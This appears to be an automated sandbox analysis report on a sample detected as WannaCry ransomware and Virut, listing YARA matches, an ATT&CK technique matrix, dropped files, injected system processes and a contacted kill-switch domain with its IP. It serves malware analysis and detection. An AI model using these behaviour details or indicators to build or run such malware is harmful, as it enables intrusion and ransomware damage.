                Source: Yara matchFile source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 840, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 952, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1780, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Virut
                Source: Yara matchFile source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 840, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 952, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1780, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter                		4
                Windows Service                		4
                Windows Service                		12
                Masquerading                		1
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Input Capture                		Exfiltration Over Other Network Medium2
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts2
                Service Execution                		Boot or Logon Initialization Scripts312
                Process Injection                		31
                Virtualization/Sandbox Evasion                		LSASS Memory361
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		Exfiltration Over Bluetooth12
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Native API                		Logon Script (Windows)Logon Script (Windows)312
                Process Injection                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer2
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Rundll32                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Software Packing                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 670273 Sample: HFKDS6VcNO Startdate: 20/07/2022 Architecture: WINDOWS Score: 100 58 Tries to download HTTP data from a sinkholed server 2->58 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 9 other signatures 2->64 9 loaddll32.exe 1 2->9         started        11 mssecsvc.exe 2->11         started        14 svchost.exe 9 1 2->14         started        process3 dnsIp4 17 cmd.exe 1 9->17         started        19 rundll32.exe 9->19         started        22 rundll32.exe 1 9->22         started        78 Maps a DLL or memory area into another process 11->78 25 dwm.exe 11->25 injected 56 127.0.0.1 unknown unknown 14->56 signatures5 process6 file7 27 rundll32.exe 17->27         started        66 Drops executables to the windows directory (C:\Windows) and starts them 19->66 29 mssecsvc.exe 7 19->29         started        48 C:\Windows\mssecsvc.exe, PE32 22->48 dropped signatures8 process9 dnsIp10 34 mssecsvc.exe 7 27->34         started        54 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.16.173.80, 49722, 49729, 80 CLOUDFLARENETUS United States 29->54 50 C:\Windows\tasksche.exe, PE32 29->50 dropped 80 Drops executables to the windows directory (C:\Windows) and starts them 29->80 38 tasksche.exe 29->38         started        file11 82 Tries to resolve many domain names, but no domain seems valid 54->82 signatures12 process13 dnsIp14 52 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 34->52 68 Antivirus detection for dropped file 34->68 70 Multi AV Scanner detection for dropped file 34->70 72 Machine Learning detection for dropped file 34->72 76 5 other signatures 34->76 40 winlogon.exe 34->40 injected 42 lsass.exe 34->42 injected 44 fontdrvhost.exe 34->44 injected 46 24 other processes 34->46 74 Detected Wannacry Ransomware 38->74 signatures15 process16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                HFKDS6VcNO.dll87%VirustotalBrowse
                HFKDS6VcNO.dll90%ReversingLabsWin32.Ransomware.WannaCry
                HFKDS6VcNO.dll100%AviraW32/Virut.Gen
                HFKDS6VcNO.dll100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Windows\mssecsvc.exe100%AviraW32/Virut.Gen
                C:\Windows\tasksche.exe100%AviraTR/FileCoder.AU
                C:\Windows\mssecsvc.exe100%Joe Sandbox ML
                C:\Windows\tasksche.exe100%Joe Sandbox ML
                C:\Windows\mssecsvc.exe90%VirustotalBrowse
                C:\Windows\mssecsvc.exe83%MetadefenderBrowse
                C:\Windows\mssecsvc.exe98%ReversingLabsWin32.Ransomware.WannaCry
                C:\Windows\tasksche.exe90%VirustotalBrowse
                C:\Windows\tasksche.exe85%MetadefenderBrowse
                C:\Windows\tasksche.exe95%ReversingLabsWin32.Ransomware.WannaCry

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File
                4.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                9.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                6.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
                6.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                9.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                4.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
                4.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
                6.2.mssecsvc.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
                4.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
                19.0.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
                4.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
                4.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
                6.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
                6.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
                4.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
                4.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                9.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
                6.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
                19.2.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
                9.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
                6.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
                6.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
                4.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
                6.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
                6.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com12%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
                https://www.kryptoslogic.com0%URL Reputationsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
                http://Passport.NET/tb0%VirustotalBrowse
                http://Passport.NET/tb0%Avira URL Cloudsafe
                http://schemas.msoft0%Avira URL Cloudsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                		104.16.173.80
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.commssecsvc.exe.2.drtrue
                • URL Reputation: malware
                		unknown
                https://www.kryptoslogic.commssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: safe
                		unknown
                http://www.google.comsvchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://Passport.NET/tbsvchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.msoftsvchost.exe, 00000018.00000000.520202728.000002670D023000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJmssecsvc.exe, 00000004.00000002.706316354.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.16.173.80
